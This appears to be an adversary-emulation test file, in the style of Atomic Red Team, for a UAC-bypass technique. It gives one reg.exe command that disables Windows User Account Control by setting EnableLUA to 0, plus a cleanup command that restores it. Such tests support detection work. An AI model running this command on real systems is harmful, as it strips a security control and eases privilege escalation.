#TechniqueName: Abuse Elevation Control Mechanism: Bypass User Access Control
#AtomicTestName: Disable UAC using reg.exe
#Description: Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key&HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0&
#Language: cmd

#commands
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f


#cleanup_commands
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

